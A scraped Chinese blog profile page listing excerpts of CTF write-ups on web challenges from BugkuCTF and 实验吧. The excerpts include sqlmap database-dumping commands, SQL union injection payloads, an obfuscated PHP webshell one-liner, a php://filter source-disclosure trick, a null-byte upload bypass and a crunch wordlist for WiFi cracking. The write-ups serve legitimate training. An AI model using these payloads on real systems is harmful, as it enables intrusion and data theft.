自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(19)
  • 收藏
  • 关注

原创 BugkuCTF 想蹭网先解开密码

破解wifi密码 通过hint告诉了密码应该是电话号码用 linux 的 crunchcrunch 11 11 -t 1391040%%%% >>wifi.txt 最小11 最大11 -t 指定模式 @ 插入小写字母 , 插入大写字母 % 插入数字 ^ 插入特殊符号aircrac...

2019-05-29 16:39:54 1096

原创 BugkuCTF 这是一个神奇的登陆框

post注入 直接跑sqlmap吧抓包到本地sqlmap.py -r "C:\Users\联想\Desktop\1.txt"admin_name存在注入点查数据库sqlmap.py -r "C:\Users\联想\Desktop\1.txt" --dbssqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 --tabl...

2019-05-15 23:54:52 337

原创 BugkuCTF web8

代码审计<?phpextract($_GET);if (!empty($ac)){$f = trim(file_get_contents($fn));if ($ac === $f){echo "<p>This is flag:" ." $flag</p>";}else{echo "<p>sorry!</p>";}}...

2019-05-15 23:11:52 451

原创 BugkuCTF 你从哪里来

提示的很明显 要从google访问我们来看看访问一个页面我们的来源在哪看百度搜索淘宝网 抓包Referer中即可看到来源现在来抓包添加Referer得到flagflag:flag{bug-ku_ai_admin}...

2019-05-14 22:12:29 563

原创 BugkuCTF 前女友(SKCTF)

打开看源代码发现有一个链接 点击进去得到php源码<?phpif(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1...

2019-05-14 21:39:20 204

原创 BugkuCTF cookies欺骗

页面中乱码 源代码也没有 只有url中有一串类似于base64说明本网页可能访问的是keys.txt,将filename换为index.phh base64加密aW5kZXgucGhw改变line即可得到代码 要么写脚本 那么就只能自己一行一行的试了import requestsa=30for i in range(a): url="http://120.24.86....

2019-05-14 21:13:23 612

原创 BugkuCTF 字符?正则?

正则的题 <?php highlight_file('2.php');$key='KEY{********************************}';$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);if( $IM ){ d...

2019-05-14 20:38:58 451

原创 BugkuCTF 过狗一句话

点开链接没有任何内容,源代码也是后台扫描也无果回到提示<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>explode() ...

2019-05-14 18:31:11 525

原创 BugkuCTF welcome to bugkuctf

查看源代码$user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf"))// $user必须存在 $user为文件且读出来...

2019-04-22 00:36:23 355

原创 BugkuCTF 成绩单

可以看出应该为sql联合注入SQL注入之联合查询注入要求查询列数相同,其中有Name、Math、 English、Chinese 一共四个数据,因此需要select 1,2,3,4构造语句 id=0' union select 1,2,3,4#查询数据库id=0' union select 1,2,3,database()#找到数据库 skctf_flag查询数据表id=0...

2019-04-02 00:27:46 1093 2

原创 BugkuCTF flag在index里

查看源代码 没有任何提示点击click me跳转到show.phpphp://filter大佬解释php://filter是PHP语言中特有的协议流,作用是作为一个“中间流”来处理其他流。比如,我们可以用如下一行代码将POST内容转换成base64编码并输出:readfile("php://filter/read=convert.base64-encode/resource=php:/...

2019-04-01 15:42:20 217

原创 实验吧 天网管理系统

题目链接:http://ctf5.shiyanbar.com/10/web1/查看源代码要求输入的用户名的值md5之后等于0 百度下就能知道很多md5为0的值MD5加密后==’0’ 总结找到新链接$unserialize_str = $_POST['password']; $data_unserialize = unserialize($unserialize_str); i...

2019-03-28 09:36:53 319

原创 实验吧 忘记密码了

题目链接:http://ctf5.shiyanbar.com/10/upload/step1.php随便输入邮箱找到./step2.php?email=youmail@mail.com&check=???打开step2自动跳转回step1抓包打开step2源代码发现submit.php 且发现还需要taken值打开submit.php提示you are not an admi...

2019-03-27 13:17:50 186

原创 实验吧 上传绕过

题目链接:http://ctf5.shiyanbar.com/web/upload/随便提交一个文件需提交jpg,gif,png后缀的文件随便提交一个jpg文件上传后的文件必须后缀名为php尝试修改上传包文件名后缀为php没有效果0x00截断0x00是ascill值为0的字符,在某些函数和url中处理会把其当做结束符抓包 添加语句进入hex 修改+的16进制...

2019-03-26 18:50:54 170

原创 实验吧 看起来有点难

题目链接:http://www.shiyanbar.com/ctf/2随便输入 “登录失败,错误的用户名和密码”直接sqlmap跑sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=pass&action=login" --dbs 查到库test查表sql...

2019-03-26 17:27:20 237

原创 实验吧 NSCTF web200

题目链接:http://ctf5.shiyanbar.com/web/web200.jpg加密 function encode ($str){ $_o = strrev($str); // 反转字符串 for ($_0=0;$_O<strlen($_o);$_O++); { // 所有字符ASCII值+1 $_c = substr($_o,$_O, 1)...

2019-03-25 18:59:45 414

原创 实验吧 程序逻辑问题

题目链接:http://ctf5.shiyanbar.com/web/5/index.php查看源代码找到index.txtphp审计<?phpif($_POST[user] && $_POST[pass]) { $conn = mysql_connect("********, "*****", "********"); mysql_select_db(...

2019-03-24 12:54:37 147

原创 实验吧 sql注入

题目链接:http://ctf5.shiyanbar.com/8/index.php?id=1 判断是否存在sql注入ctf5.shiyanbar.com/8/index.php?id=1' 报错ctf5.shiyanbar.com/8/index.php?id=1 and 1=1 正常打开 ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 ...

2019-03-23 22:27:12 273

原创 记第一篇博客

文章目录3tu6b0rnHello World!return 0;3tu6b0rn你好! 这是你第一次使用 CSDN 所展示的欢迎页。Hello World!你将踏上一段新的征程无论前途坎坷只顾风雨兼程return 0;...

2019-03-22 23:06:46 98

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除